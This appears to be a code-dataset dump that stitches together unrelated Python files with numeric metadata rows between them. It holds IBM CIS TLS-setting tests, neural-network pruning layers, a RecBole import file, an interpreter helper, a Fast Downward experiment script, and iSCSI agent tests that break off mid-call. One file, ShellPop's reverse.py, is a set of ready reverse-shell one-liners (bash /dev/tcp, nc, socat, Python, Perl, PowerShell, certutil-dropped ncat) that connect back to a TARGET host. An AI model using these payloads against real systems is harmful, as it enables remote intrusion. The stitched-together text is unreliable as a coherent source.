        sent_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert sent_body['value'] == value

    @responses.activate
    def test_change_tls12_setting_required_params(self):
        # Register the mocked PATCH endpoint with a canned JSON payload.
        endpoint = base_url + '/v1/testString/zones/testString/settings/tls_1_2_only'
        canned_json = '{"result": {"id": "tls_1_2_only", "value": "on", "editable": true, "modified_on": "2019-01-01T12:00:00"}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(responses.PATCH, endpoint,
                      body=canned_json,
                      content_type='application/json',
                      status=200)

        # Invoke with no optional parameters at all.
        response = service.change_tls12_setting()

        # Exactly one HTTP call was made and it succeeded.
        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for get_tls13_setting
#-----------------------------------------------------------------------------
class TestGetTls13Setting():
    """Unit tests for get_tls13_setting()."""

    @responses.activate
    def test_get_tls13_setting_all_params(self):
        # Register the mocked GET endpoint with a canned JSON payload.
        endpoint = base_url + '/v1/testString/zones/testString/settings/tls_1_3'
        canned_json = '{"result": {"id": "tls_1_3", "value": "on", "editable": true, "modified_on": "2019-01-01T12:00:00"}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(responses.GET, endpoint,
                      body=canned_json,
                      content_type='application/json',
                      status=200)

        # Invoke the operation under test.
        response = service.get_tls13_setting()

        # Exactly one HTTP call was made and it succeeded.
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_tls13_setting_required_params(self):
        # Register the mocked GET endpoint with a canned JSON payload.
        endpoint = base_url + '/v1/testString/zones/testString/settings/tls_1_3'
        canned_json = '{"result": {"id": "tls_1_3", "value": "on", "editable": true, "modified_on": "2019-01-01T12:00:00"}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(responses.GET, endpoint,
                      body=canned_json,
                      content_type='application/json',
                      status=200)

        # Invoke with required parameters only (none beyond defaults).
        response = service.get_tls13_setting()

        # Exactly one HTTP call was made and it succeeded.
        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for change_tls13_setting
#-----------------------------------------------------------------------------
class TestChangeTls13Setting():
    """Unit tests for change_tls13_setting()."""

    @responses.activate
    def test_change_tls13_setting_all_params(self):
        # Register the mocked PATCH endpoint with a canned JSON payload.
        endpoint = base_url + '/v1/testString/zones/testString/settings/tls_1_3'
        canned_json = '{"result": {"id": "tls_1_3", "value": "on", "editable": true, "modified_on": "2019-01-01T12:00:00"}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(responses.PATCH, endpoint,
                      body=canned_json,
                      content_type='application/json',
                      status=200)

        # Call the service with every supported parameter.
        value = 'on'
        response = service.change_tls13_setting(
            value=value,
        )

        # Exactly one HTTP call was made and it succeeded.
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # The request body must carry the parameter we supplied.
        sent_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert sent_body['value'] == value

    @responses.activate
    def test_change_tls13_setting_required_params(self):
        # Register the mocked PATCH endpoint with a canned JSON payload.
        endpoint = base_url + '/v1/testString/zones/testString/settings/tls_1_3'
        canned_json = '{"result": {"id": "tls_1_3", "value": "on", "editable": true, "modified_on": "2019-01-01T12:00:00"}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(responses.PATCH, endpoint,
                      body=canned_json,
                      content_type='application/json',
                      status=200)

        # Invoke with no optional parameters at all.
        response = service.change_tls13_setting()

        # Exactly one HTTP call was made and it succeeded.
        assert len(responses.calls) == 1
        assert response.status_code == 200
# endregion
##############################################################################
# End of Service: SSLCertificate
##############################################################################
| 42.036275
| 557
| 0.515101
| 3,800
| 42,877
| 5.590263
| 0.065263
| 0.029374
| 0.016476
| 0.038413
| 0.903215
| 0.900956
| 0.881231
| 0.846396
| 0.795886
| 0.783835
| 0
| 0.028942
| 0.227208
| 42,877
| 1,019
| 558
| 42.077527
| 0.612162
| 0.269305
| 0
| 0.766409
| 0
| 0.050193
| 0.324554
| 0.102618
| 0
| 0
| 0
| 0
| 0.160232
| 1
| 0.065637
| false
| 0
| 0.013514
| 0
| 0.111969
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
07e467a1ed5b4e7e91875d972b5c92dc92b1a7b3
| 2,676
|
py
|
Python
|
strategies/ASLP/layer_functions.py
|
N0ciple/ASLP
|
e7a55057e78e7cc565f53559ac21b88c796b90c4
|
[
"MIT"
] | null | null | null |
strategies/ASLP/layer_functions.py
|
N0ciple/ASLP
|
e7a55057e78e7cc565f53559ac21b88c796b90c4
|
[
"MIT"
] | null | null | null |
strategies/ASLP/layer_functions.py
|
N0ciple/ASLP
|
e7a55057e78e7cc565f53559ac21b88c796b90c4
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
def add_linear_layer_parameters(layer, config=None):
    """Attach ASLP pruning parameters to a linear layer, in place.

    Adds a trainable ``mask`` (per-weight keep-logits, filled with
    ``config['init_value']``) and a scalar ``scaling_param``.  When
    ``config['signed_constant']`` is true, the weights are reinitialised
    to sign(w) * std(w) ("signed constant" initialisation).
    `config` must be a mapping with those two keys.
    """
    mask_init = config['init_value'] * torch.ones_like(layer.weight)
    layer.mask = nn.Parameter(mask_init, requires_grad=True)
    layer.scaling_param = nn.Parameter(torch.tensor(1.0), requires_grad=True)
    if config["signed_constant"]:
        with torch.no_grad():
            weight_std = torch.std(layer.weight)
            layer.weight.copy_(weight_std * torch.sign(layer.weight))
def add_conv_layer_parameters(layer, config=None):
    """Attach ASLP pruning parameters to a convolution layer, in place.

    Mirrors ``add_linear_layer_parameters``: adds a trainable ``mask``
    filled with ``config['init_value']`` and a scalar ``scaling_param``,
    and optionally reinitialises the weights to sign(w) * std(w) when
    ``config['signed_constant']`` is true.
    """
    mask_init = config['init_value'] * torch.ones_like(layer.weight)
    layer.mask = nn.Parameter(mask_init, requires_grad=True)
    layer.scaling_param = nn.Parameter(torch.tensor(1.0), requires_grad=True)
    if config["signed_constant"]:
        with torch.no_grad():
            weight_std = torch.std(layer.weight)
            layer.weight.copy_(weight_std * torch.sign(layer.weight))
def linear_layer_forward(layer, input):
    """Forward pass of an ASLP-masked linear layer.

    Samples a per-weight keep/drop decision from the layer's mask logits
    with the Gumbel-softmax trick and applies the sampled mask (and,
    optionally, the learned scaling) to the weights before the usual
    affine transform.  Expects ``layer.mask``, ``layer.scaling_param``
    and a ``layer.config`` mapping to have been attached beforehand.
    """
    # Two logit rows: index 0 = "keep" (layer.mask), index 1 = "drop" (zeros).
    drop_logits = torch.zeros_like(layer.mask)
    logits = torch.stack((layer.mask, drop_logits))
    # Draw one (optionally hard/one-hot) sample per weight entry.
    sample = F.gumbel_softmax(
        logits,
        hard=layer.config.get("hard_gumbel", True),
        tau=layer.config.get("gumbel_tau", 1),
        dim=0,
    )
    keep = sample[0]
    # Build the masked weight, optionally rescaled by the learned scalar.
    if layer.config.get("weight_rescale", False):
        masked_weight = layer.scaling_param * layer.weight * keep
    else:
        masked_weight = layer.weight * keep
    return F.linear(input, masked_weight, layer.bias)
def conv_layer_forward(layer, input):
    """Forward pass of an ASLP-masked convolution layer.

    Samples a per-weight keep/drop decision from the layer's mask logits
    with the Gumbel-softmax trick and convolves the input with the masked
    (and optionally rescaled) weights.  Expects ``layer.mask``,
    ``layer.scaling_param`` and a ``layer.config`` mapping to have been
    attached beforehand (see ``add_conv_layer_parameters``).
    """
    # Two logit rows: index 0 = "keep" (layer.mask), index 1 = "drop" (zeros).
    proba_leave = torch.zeros_like(layer.mask)
    log_proba_tensor = torch.stack((layer.mask, proba_leave))
    # Sample one (optionally hard/one-hot) mask value per weight entry.
    sampled_tensor = F.gumbel_softmax(
        log_proba_tensor,
        hard=layer.config.get("hard_gumbel", True),
        tau=layer.config.get("gumbel_tau", 1),
        dim=0,
    )
    # Mask the weights to create hat_weight.
    if layer.config.get("weight_rescale", False):
        hat_weight = layer.scaling_param * layer.weight * sampled_tensor[0]
    else:
        hat_weight = layer.weight * sampled_tensor[0]
    # Bug fix: torch >= 1.8 changed _conv_forward to take the bias
    # explicitly (older torch applied self.bias internally), so the
    # original two-argument call raises TypeError on modern torch.
    # Passing layer.bias preserves the pre-1.8 semantics.
    return layer._conv_forward(input, hat_weight, layer.bias)
| 43.16129
| 103
| 0.635277
| 332
| 2,676
| 4.891566
| 0.195783
| 0.121921
| 0.062808
| 0.044335
| 0.910099
| 0.910099
| 0.910099
| 0.910099
| 0.910099
| 0.910099
| 0
| 0.006094
| 0.2642
| 2,676
| 61
| 104
| 43.868852
| 0.81869
| 0.073617
| 0
| 0.780488
| 0
| 0
| 0.048583
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097561
| false
| 0
| 0.073171
| 0
| 0.219512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58026c332961a43a7d65ccfeba2878c28df582de
| 428
|
py
|
Python
|
recbole/data/dataset/__init__.py
|
Zephyr-29/RecBole
|
e8300611765c947ce904f29c610b188033ec8da8
|
[
"MIT"
] | 1
|
2021-02-03T11:07:05.000Z
|
2021-02-03T11:07:05.000Z
|
recbole/data/dataset/__init__.py
|
Zephyr-29/RecBole
|
e8300611765c947ce904f29c610b188033ec8da8
|
[
"MIT"
] | null | null | null |
recbole/data/dataset/__init__.py
|
Zephyr-29/RecBole
|
e8300611765c947ce904f29c610b188033ec8da8
|
[
"MIT"
] | null | null | null |
from recbole.data.dataset.dataset import Dataset
from recbole.data.dataset.sequential_dataset import SequentialDataset
from recbole.data.dataset.kg_dataset import KnowledgeBasedDataset
from recbole.data.dataset.social_dataset import SocialDataset
from recbole.data.dataset.kg_seq_dataset import Kg_Seq_Dataset
from recbole.data.dataset.xgboost_dataset import XgboostDataset
from recbole.data.dataset.customized_dataset import *
| 53.5
| 69
| 0.883178
| 57
| 428
| 6.473684
| 0.263158
| 0.208672
| 0.284553
| 0.417344
| 0.287263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065421
| 428
| 7
| 70
| 61.142857
| 0.9225
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ed575a35a029fab0ce40bba1e8680698eec28209
| 191
|
py
|
Python
|
src/interpreter/functions/repeat.py
|
BowlingPizzaBall/b-star
|
3e614443281702e124309ea7496314519b707b5f
|
[
"MIT"
] | null | null | null |
src/interpreter/functions/repeat.py
|
BowlingPizzaBall/b-star
|
3e614443281702e124309ea7496314519b707b5f
|
[
"MIT"
] | null | null | null |
src/interpreter/functions/repeat.py
|
BowlingPizzaBall/b-star
|
3e614443281702e124309ea7496314519b707b5f
|
[
"MIT"
] | null | null | null |
from typing import List
from src.interpreter.expression import Expression
def repeat(block: List, codebase):
    """Evaluate ``block[1]`` as a string and repeat it ``block[2]`` times.

    Both operands are evaluated as expressions against *codebase*; the
    second one must evaluate to an integer (string repetition count).
    """
    text = str(Expression(block[1], codebase))
    count = Expression(block[2], codebase)
    return text * count
| 27.285714
| 79
| 0.769634
| 25
| 191
| 5.88
| 0.6
| 0.204082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011976
| 0.125654
| 191
| 6
| 80
| 31.833333
| 0.868263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
9c31f1f2fb4e96be208860fdaa1d79a86c70215d
| 5,075
|
py
|
Python
|
src/reverse.py
|
bradfireborn/ShellPop
|
34edbd2224bd4116dbf8d09a9add0d102ab82dd3
|
[
"MIT"
] | 1
|
2021-06-11T19:07:24.000Z
|
2021-06-11T19:07:24.000Z
|
src/reverse.py
|
bluuberry/ShellPop
|
c7240755c2eb1c15acc3383766de49c2c04bcf4b
|
[
"MIT"
] | null | null | null |
src/reverse.py
|
bluuberry/ShellPop
|
c7240755c2eb1c15acc3383766de49c2c04bcf4b
|
[
"MIT"
] | 1
|
2018-06-23T02:11:22.000Z
|
2018-06-23T02:11:22.000Z
|
#!/usr/bin/env python
from binary import WINDOWS_NCAT, binary_to_bat, shellcode_to_ps1
# Each function below returns a reverse-shell one-liner template.  The
# literal placeholders TARGET and PORT are substituted later by the caller
# (presumably shellpop's payload builder — TODO confirm against caller).
# The payload strings are exact command lines; do not reformat them.


def REV_PYTHON_TCP():
    # Python TCP reverse shell: dup2 the socket onto stdio, spawn bash in a pty.
    return """python -c \"import os; import pty; import socket; lhost = 'TARGET'; lport = PORT; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv('HISTFILE', '/dev/null'); pty.spawn('/bin/bash'); s.close();\" """


def REV_PYTHON_UDP():
    # Same as REV_PYTHON_TCP but over a UDP (SOCK_DGRAM) socket.
    return """python -c \"import os; import pty; import socket; lhost = 'TARGET'; lport = PORT; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv('HISTFILE', '/dev/null'); pty.spawn('/bin/bash'); s.close();\" """


def REV_PHP_TCP():
    # PHP TCP reverse shell via fsockopen + exec with fd redirection.
    return r"""php -r "\$sock=fsockopen('TARGET',PORT);exec('/bin/sh -i <&3 >&3 2>&3');" """


def REV_RUBY_TCP():
    # Ruby TCP reverse shell: fork, connect, pipe each received command through IO.popen.
    return """ruby -rsocket -e "exit if fork;c=TCPSocket.new('TARGET','PORT');while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end" """


def REV_PERL_TCP():
    # Perl TCP reverse shell: reopen STDIN/STDOUT/STDERR onto the socket, exec sh.
    return r"""perl -e "use Socket;\$i='TARGET';\$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};" """


def REV_PERL_TCP_2():
    # Alternate Perl TCP reverse shell using IO::Socket::INET and fdopen.
    return r"""perl -MIO -e "\$p=fork;exit,if(\$p);\$c=new IO::Socket::INET(PeerAddr,'TARGET:PORT');STDIN->fdopen(\$c,r);$~->fdopen(\$c,w);system\$_ while<>;" """


def REV_PERL_UDP():
    # Perl UDP reverse shell: banner on connect, then recv/qx/send loop.
    return """perl -e 'use IO::Socket::INET;$|=1;my ($s,$r);my ($pa,$pp);$s=new IO::Socket::INET->new();$s = new IO::Socket::INET(PeerAddr => "TARGET:PORT",Proto => "udp"); $s->send("SHELLPOP PWNED!\n");while(1) { $s->recv($r,1024);$pa=$s->peerhost();$pp=$s->peerport();$d=qx($r);$s->send($d);}'"""


def BASH_TCP():
    # Pure-bash reverse shell using the /dev/tcp pseudo-device.
    return """/bin/bash -i >& /dev/tcp/TARGET/PORT 0>&1"""


def REV_POWERSHELL_TCP():
    # PowerShell TCP reverse shell: TCPClient loop that reads a command,
    # Invoke-Expression's it and writes the result (plus a PS prompt) back.
    return """powershell -nop -ep bypass -Command '$ip="TARGET";$port=PORT;$client = New-Object System.Net.Sockets.TCPClient($ip, $port);$stream=$client.GetStream();[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes(\\"Windows PowerShell running as user \\" + $env:username + \\" on \\" + $env:computername + \\"`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n\\");$stream.Write($sendbytes,0,$sendbytes.Length);$sendbytes = ([text.encoding]::ASCII).GetBytes(\\"PS \\" + (Get-Location).Path + \\"> \\");$stream.Write($sendbytes,0,$sendbytes.Length);while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $returndata = ([text.encoding]::ASCII).GetString($bytes, 0, $i); try { $result = (Invoke-Expression -command $returndata 2>&1 | Out-String ) } catch { Write-Warning \\"Something went wrong with execution of command on the target.\\"; Write-Error $_; }; $sendback = $result + \\"PS \\" + (Get-Location).Path + \\"> \\"; $x = ($error[0] | Out-String); $error.clear(); $sendback = $sendback + $x; $sendbytes = ([text.encoding]::ASCII).GetBytes($sendback); $stream.Write($sendbytes, 0, $sendbytes.Length); $stream.Flush();}; $client.Close(); if ($listener) { $listener.Stop(); };'"""


def REVERSE_TCLSH():
    # Tcl reverse shell: prompt/eval loop over a socket, piped into tclsh.
    return """echo 'set s [socket TARGET PORT];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh"""


def REVERSE_NCAT():
    # ncat with -e: execute bash with stdio bound to the connection.
    return "ncat TARGET PORT -e /bin/bash"


def REVERSE_NC_TRADITIONAL_1():
    # Traditional netcat with -c shell execution.
    return "nc TARGET PORT -c /bin/bash"


def REVERSE_NC_UDP_1():
    # UDP netcat reverse shell plumbed through a named pipe.
    return """mkfifo fifo ; nc.traditional -u TARGET PORT < fifo | { bash -i; } > fifo"""


def REVERSE_MKFIFO_NC():
    # mkfifo + nc reverse shell; removes a stale /tmp/f pipe first.
    return "if [ -e /tmp/f ]; then rm /tmp/f;fi;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc TARGET PORT > /tmp/f"


def REVERSE_MKNOD_NC():
    # mknod(p) + nc variant of the named-pipe reverse shell.
    return "if [ -e /tmp/f ]; then rm -f /tmp/f;fi;mknod /tmp/f p && nc TARGET PORT 0</tmp/f|/bin/bash 1>/tmp/f"


def REVERSE_MKFIFO_TELNET():
    # mkfifo + telnet variant of the named-pipe reverse shell.
    return "if [ -e /tmp/f ]; then rm /tmp/f;fi;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet TARGET PORT > /tmp/f"


def REVERSE_MKNOD_TELNET():
    # mknod(p) + telnet variant of the named-pipe reverse shell.
    return "if [ -e /tmp/f ]; then rm /tmp/f;fi;mknod /tmp/f p && telnet TARGET PORT 0</tmp/f|/bin/bash 1>/tmp/f"


def REVERSE_SOCAT():
    # socat reverse shell with a proper pty and sane terminal settings.
    return """socat tcp-connect:TARGET:PORT exec:"bash -li",pty,stderr,setsid,sigint,sane"""


def REVERSE_AWK():
    # GNU awk reverse shell over its built-in /inet/tcp networking.
    return """awk 'BEGIN {s = "/inet/tcp/0/TARGET/PORT"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null"""


def REVERSE_AWK_UDP():
    # Same as REVERSE_AWK but over /inet/udp.
    return """awk 'BEGIN {s = "/inet/udp/0/TARGET/PORT"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null"""


def REVERSE_WINDOWS_NCAT_TCP():
    # Windows batch payload: drop a base64-encoded ncat, decode it with
    # certutil, run it as a reverse cmd.exe shell, then delete the binary.
    return """{0}\ncertutil -decode %Temp%\\nc.b64 %Temp%\\nc.exe\n%Temp%\\nc.exe -e cmd.exe TARGET PORT\ndel %Temp%\\nc.exe\n""".format(binary_to_bat(WINDOWS_NCAT, file="%Temp%\\nc.b64"))


def REVERSE_WINDOWS_BLOODSEEKER_TCP():
    # Placeholder: this payload is generated elsewhere by custom code.
    return """ Custom Shell requires a Custom code. """
| 74.632353
| 1,233
| 0.639606
| 824
| 5,075
| 3.864078
| 0.253641
| 0.025126
| 0.013191
| 0.024497
| 0.411118
| 0.349874
| 0.315955
| 0.268844
| 0.261621
| 0.261621
| 0
| 0.016226
| 0.113498
| 5,075
| 68
| 1,234
| 74.632353
| 0.691487
| 0.003941
| 0
| 0
| 0
| 0.4
| 0.808111
| 0.268051
| 0
| 0
| 0
| 0
| 0
| 1
| 0.488889
| true
| 0.022222
| 0.066667
| 0.488889
| 1.044444
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
9c33948a84130176bf136241dc9ba2d55c963d5e
| 2,834
|
py
|
Python
|
experiments/issue548/mas.py
|
nitinkaveriappa/downward
|
5c9a1b5111d667bb96f94da61ca2a45b1b70bb83
|
[
"MIT"
] | 4
|
2019-04-23T10:41:35.000Z
|
2019-10-27T05:14:42.000Z
|
experiments/issue548/mas.py
|
nitinkaveriappa/downward
|
5c9a1b5111d667bb96f94da61ca2a45b1b70bb83
|
[
"MIT"
] | null | null | null |
experiments/issue548/mas.py
|
nitinkaveriappa/downward
|
5c9a1b5111d667bb96f94da61ca2a45b1b70bb83
|
[
"MIT"
] | 4
|
2018-01-16T00:00:22.000Z
|
2019-11-01T23:35:01.000Z
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from downward import suites
import common_setup
# Revisions being compared: the issue548 branch point and its first patch.
REVS = ["issue548-base", "issue548-v1"]
# Per-run resource limits (seconds of search time).
LIMITS = {"search_time": 1800}
# Benchmark suite: the optimal-track problems including IPC 2011.
SUITE = suites.suite_optimal_with_ipc11()
# Merge-and-shrink configurations with bisimulation shrinking capped at
# 50k states, keyed by merge strategy (reverse level / CG goal level / DFP).
B_CONFIGS = {
    'rl-b50k': ['--search', 'astar(merge_and_shrink(merge_strategy=merge_linear(variable_order=reverse_level),shrink_strategy=shrink_bisimulation(max_states=50000,threshold=1,greedy=false),label_reduction=label_reduction(before_shrinking=true,before_merging=false)))'],
    'cggl-b50k': ['--search', 'astar(merge_and_shrink(merge_strategy=merge_linear(variable_order=cg_goal_level),shrink_strategy=shrink_bisimulation(max_states=50000,threshold=1,greedy=false),label_reduction=label_reduction(before_shrinking=true,before_merging=false)))'],
    'dfp-b50k': ['--search', 'astar(merge_and_shrink(merge_strategy=merge_dfp,shrink_strategy=shrink_bisimulation(max_states=50000,threshold=1,greedy=false),label_reduction=label_reduction(before_shrinking=true,before_merging=false)))'],
}
# Greedy bisimulation shrinking with no state cap (max_states=infinity).
G_CONFIGS = {
    'rl-ginf': ['--search', 'astar(merge_and_shrink(merge_strategy=merge_linear(variable_order=reverse_level),shrink_strategy=shrink_bisimulation(max_states=infinity,threshold=1,greedy=true),label_reduction=label_reduction(before_shrinking=true,before_merging=false)))'],
    'cggl-ginf': ['--search', 'astar(merge_and_shrink(merge_strategy=merge_linear(variable_order=cg_goal_level),shrink_strategy=shrink_bisimulation(max_states=infinity,threshold=1,greedy=true),label_reduction=label_reduction(before_shrinking=true,before_merging=false)))'],
    'dfp-ginf': ['--search', 'astar(merge_and_shrink(merge_strategy=merge_dfp,shrink_strategy=shrink_bisimulation(max_states=infinity,threshold=1,greedy=true),label_reduction=label_reduction(before_shrinking=true,before_merging=false)))'],
}
# f-preserving shrinking (shrink_fh) capped at 50k states; note label
# reduction happens before merging here, not before shrinking.
F_CONFIGS = {
    'rl-f50k': ['--search', 'astar(merge_and_shrink(merge_strategy=merge_linear(variable_order=reverse_level),shrink_strategy=shrink_fh(max_states=50000),label_reduction=label_reduction(before_shrinking=false,before_merging=true)))'],
    'cggl-f50k': ['--search', 'astar(merge_and_shrink(merge_strategy=merge_linear(variable_order=cg_goal_level),shrink_strategy=shrink_fh(max_states=50000),label_reduction=label_reduction(before_shrinking=false,before_merging=true)))'],
    'dfp-f50k': ['--search', 'astar(merge_and_shrink(merge_strategy=merge_dfp,shrink_strategy=shrink_fh(max_states=50000),label_reduction=label_reduction(before_shrinking=false,before_merging=true)))'],
}
# Union of all three configuration families.
CONFIGS = dict(B_CONFIGS)
CONFIGS.update(G_CONFIGS)
CONFIGS.update(F_CONFIGS)
# Build the experiment: every config on every revision over SUITE.
exp = common_setup.IssueExperiment(
    search_revisions=REVS,
    configs=CONFIGS,
    suite=SUITE,
    limits=LIMITS,
    test_suite=['depot:pfile1'],
    processes=4,
    email='silvan.sievers@unibas.ch',
)
# Add the base-vs-v1 comparison report, then run the experiment steps.
exp.add_comparison_table_step()
exp()
| 64.409091
| 273
| 0.801341
| 380
| 2,834
| 5.631579
| 0.215789
| 0.117757
| 0.06729
| 0.079907
| 0.808411
| 0.808411
| 0.808411
| 0.808411
| 0.808411
| 0.802804
| 0
| 0.023907
| 0.055399
| 2,834
| 43
| 274
| 65.906977
| 0.775495
| 0.015173
| 0
| 0
| 0
| 0.264706
| 0.770886
| 0.702402
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.058824
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
131ad0751ec5ad1876c4521117a125e588c6de79
| 18,187
|
py
|
Python
|
ironic_python_agent/tests/unit/extensions/test_iscsi.py
|
ooneko/ironic-python-agent
|
c2ef8530dbff303e998ac2acdc3402531646f62d
|
[
"Apache-2.0"
] | null | null | null |
ironic_python_agent/tests/unit/extensions/test_iscsi.py
|
ooneko/ironic-python-agent
|
c2ef8530dbff303e998ac2acdc3402531646f62d
|
[
"Apache-2.0"
] | null | null | null |
ironic_python_agent/tests/unit/extensions/test_iscsi.py
|
ooneko/ironic-python-agent
|
c2ef8530dbff303e998ac2acdc3402531646f62d
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from ironic_lib import disk_utils
from oslo_concurrency import processutils
from ironic_python_agent import errors
from ironic_python_agent.extensions import iscsi
from ironic_python_agent import hardware
from ironic_python_agent.tests.unit import base
from ironic_python_agent import utils
class FakeAgent(object):
    """Minimal stand-in for the IPA agent used by the iSCSI tests."""

    # The iSCSI extension flips this flag once the target is started.
    iscsi_started = False

    def get_node_uuid(self):
        """Return a fixed node UUID for the tests."""
        return 'my_node_uuid'
@mock.patch.object(disk_utils, 'destroy_disk_metadata', autospec=True)
@mock.patch.object(hardware, 'dispatch_to_managers', autospec=True)
@mock.patch.object(utils, 'execute', autospec=True)
@mock.patch.object(iscsi.rtslib_fb, 'RTSRoot',
                   mock.Mock(side_effect=iscsi.rtslib_fb.RTSLibError()))
class TestISCSIExtensionTgt(base.IronicAgentTest):
    """Tests for the tgtd/tgtadm-based iSCSI target path.

    RTSRoot is patched to raise RTSLibError, which forces the extension
    away from the LIO backend and onto the tgtadm commands verified here.
    The class decorators inject mocks bottom-up: mock_execute,
    mock_dispatch, mock_destroy.
    """

    def setUp(self):
        super(TestISCSIExtensionTgt, self).setUp()
        # Fresh extension wired to a fake agent; fixed device/IQN fixtures.
        self.agent_extension = iscsi.ISCSIExtension(FakeAgent())
        self.fake_dev = '/dev/fake'
        self.fake_iqn = 'iqn-fake'

    def test_start_iscsi_target(self, mock_execute,
                                mock_dispatch,
                                mock_destroy):
        # Happy path: target created on the dispatched OS install device.
        mock_dispatch.return_value = self.fake_dev
        mock_execute.return_value = ('', '')
        self.assertFalse(self.agent_extension.agent.iscsi_started)
        result = self.agent_extension.start_iscsi_target(iqn=self.fake_iqn)
        # The extension must flag the agent as having started iSCSI.
        self.assertTrue(self.agent_extension.agent.iscsi_started)
        # Expected command sequence: start tgtd, poll it, create target,
        # attach the backing-store LUN, bind to all initiators.
        expected = [mock.call('tgtd'),
                    mock.call('tgtadm', '--lld', 'iscsi', '--mode',
                              'target', '--op', 'show', attempts=10),
                    mock.call('tgtadm', '--lld', 'iscsi', '--mode',
                              'target', '--op', 'new', '--tid', '1',
                              '--targetname', self.fake_iqn),
                    mock.call('tgtadm', '--lld', 'iscsi', '--mode',
